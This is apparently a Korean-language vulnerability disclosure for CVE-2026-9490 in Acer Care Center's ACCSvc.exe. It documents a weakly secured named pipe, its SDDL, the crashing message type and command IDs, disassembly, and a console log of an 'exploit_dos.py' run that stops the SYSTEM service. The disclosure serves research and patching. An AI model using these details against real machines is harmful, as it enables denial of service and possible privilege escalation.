
ACCSvc 서비스는 약한 보안 설명자(Security Descriptor)를 가진 Named Pipe를 생성하여 인증된 모든 사용자가 연결하고 메시지를 보낼 수 있게 합니다. 특수하게 조작된 메시지(메시지 유형 0x03)가 파이프로 전송되면 서비스는 종료 코드 1067(ERROR_PROCESS_ABORTED)과 함께 충돌합니다.
CVE ID: CVE-2026-9490
연구자: Vo Duc Thang (ugvxb)
공식 인정: https://community.acer.com/en/kb/articles/19668
Acer Care Center 서비스(ACCSvc.exe)에서 심각한 보안 취약점이 확인되었습니다. 이 취약점으로 인해 인증된 모든 로컬 사용자가 보안이 취약한 Named Pipe 인터페이스를 통해 시스템 서비스를 중단(서비스 거부)시키고 잠재적으로 권한을 상승시킬 수 있습니다.
SYSTEM 권한(LocalSystem)으로 실행되는 이 서비스는 모든 인증된 사용자에게 읽기, 쓰기, 실행 권한을 부여하는 과도하게 허용적인 액세스 제어가 적용된 Named Pipe를 노출합니다.
| 속성 | 값 |
|---|---|
| 제품 | Acer Care Center |
| 구성 요소 | ACCSvc.exe (ACC 서비스) |
| 서비스 이름 | ACCSvc |
| 설치 경로 | C:\Program Files (x86)\Acer\Care Center\ |
| 서비스 계정 | LocalSystem (NT AUTHORITY\SYSTEM) |
| 시작 유형 | AUTO_START |
| Named Pipe | \.\pipe\treadstone_service_LightMode |
ACCSvc 서비스는 인증된 모든 사용자가 연결하고 메시지를 전송할 수 있도록 허용하는 취약한 보안 설명자(Security Descriptor)로 Named Pipe를 생성합니다. 특수하게 조작된 메시지(메시지 유형 0x03)가 파이프로 전송되면 서비스는 종료 코드 1067(ERROR_PROCESS_ABORTED)과 함께 중단됩니다.
D:(D;OICI;GA;;;BG)(D;OICI;GA;;;AN)(A;OICI;GRGWGX;;;AU)(A;OICI;GA;;;BA)
특별한 권한이 없는 일반 사용자가 ACCSvc 시스템 서비스를 종료하여 Acer Care Center 기능을 사용할 수 없게 만들 수 있습니다.
동일한 취약한 Named Pipe ACL로 인해 인증된 사용자가 CreateProcessAsUserW를 통해 서비스가 런처 애플리케이션을 실행하도록 트리거하는 명령 메시지를 전송할 수 있습니다.
| 명령 | 16진수 값 | 대상 실행 파일 |
|---|---|---|
| 0x19065 | 102501 | ACCAPPLauncher.exe |
| 0x19066 | 102502 | ACCSWALauncher.exe |
| 0x19067 | 102503 | ACCFixpackFolderCleaner.exe |
| 속성 | 값 |
|---|---|
| 파일 | ACCSvc.exe |
| 유형 | PE32+ 실행 파일(콘솔) x86-64 |
| 분석 도구 | Radare2 |
| 진입점 | 0x14000fd4c |
Pipe Name: \\.\pipe\treadstone_service_LightMode
dwOpenMode: 0x03 (PIPE_ACCESS_DUPLEX)
dwPipeMode: 0x06 (PIPE_TYPE_MESSAGE | PIPE_READMODE_MESSAGE)
nMaxInstances: 255
nOutBufferSize: 512
nInBufferSize: 512
nDefaultTimeOut: 1000ms
0x140008b1a mov ebx, dword [rdx + rcx] ; Read command
0x140008b1d lea eax, [rbx - 0x19065] ; Subtract base
0x140008b23 cmp eax, 2 ; Check range
0x140008b26 ja 0x140008bde ; Jump if invalid
accesschk.exe -v \pipe\treadstone_service_LightMode
Accesschk v6.15 - Reports effective permissions for securable objects
Copyright (C) 2006-2022 Mark Russinovich
Sysinternals - www.sysinternals.com
\\.\Pipe\treadstone_service_LightMode
Medium Mandatory Level (Default) [No-Write-Up]
RW NT AUTHORITY\Authenticated Users
FILE_ADD_FILE
FILE_CREATE_PIPE_INSTANCE
FILE_APPEND_DATA
FILE_EXECUTE
FILE_LIST_DIRECTORY
FILE_READ_ATTRIBUTES
FILE_READ_DATA
FILE_READ_EA
FILE_TRAVERSE
FILE_WRITE_ATTRIBUTES
FILE_WRITE_DATA
FILE_WRITE_EA
SYNCHRONIZE
READ_CONTROL
RW BUILTIN\Administrators
FILE_ALL_ACCESS
C:\Users\thang\Downloads\Acer>whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ==================================== ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
C:\Users\thang\Downloads\Acer>sc qc ACCSvc
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: ACCSvc
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : "C:\Program Files (x86)\Acer\Care Center\ACCSvc.exe"
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : ACC Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Users\thang\Downloads\Acer>sc query ACCSvc
SERVICE_NAME: ACCSvc
TYPE : 10 WIN32_OWN_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
C:\Users\thang\Downloads\Acer>python exploit_dos.py
[*] ACCSvc DoS Attack
[*] Target: \\.\pipe\treadstone_service_LightMode
[+] DoS payload sent - service should crash
C:\Users\thang\Downloads\Acer>sc query ACCSvc
SERVICE_NAME: ACCSvc
TYPE : 10 WIN32_OWN_PROCESS
STATE : 1 STOPPED
WIN32_EXIT_CODE : 1067 (0x42b)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
결과: 일반 사용자가 SYSTEM 서비스를 성공적으로 중단시켰습니다!
| 지표 | 값 |
|---|---|
| CVSS 4.0 벡터 | AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/RE:M |
| CVSS 기본 점수 | 6.8 (중간) |
| CWE ID | 이름 |
|---|---|
| CWE-269 | 부적절한 권한 관리 |
이 PoC는 교육 및 승인된 보안 연구 목적으로만 제공됩니다. 작성자는 오용에 대해 책임을 지지 않습니다. 승인되지 않은 악용은 불법입니다.
| ACE | 보안 주체 | 권한 | 평가 |
|---|
| (D;OICI;GA;;;BG) | Builtin 게스트 | 모두 거부 | 안전 |
| (D;OICI;GA;;;AN) | 익명 사용자 | 모두 거부 | 안전 |
| (A;OICI;GRGWGX;;;AU) | 인증된 사용자 | 읽기/쓰기/실행 | 취약 |
| (A;OICI;GA;;;BA) | Builtin 관리자 | 모두 허용 | 예상됨 |
| 함수 | 주소 | 용도 |
|---|
| fcn.140009a70 | 0x140009a70 | CreateNamedPipeW - 취약한 파이프 생성 |
| fcn.140007570 | 0x140007570 | CreateProcessAsUserW - 프로세스 생성 |
| fcn.14000a8a0 | 0x14000a8a0 | ReadFile 핸들러 |
| fcn.140009950 | 0x140009950 | WriteFile 핸들러 |
| fcn.140008050 | 0x140008050 | 메시지 디스패처 |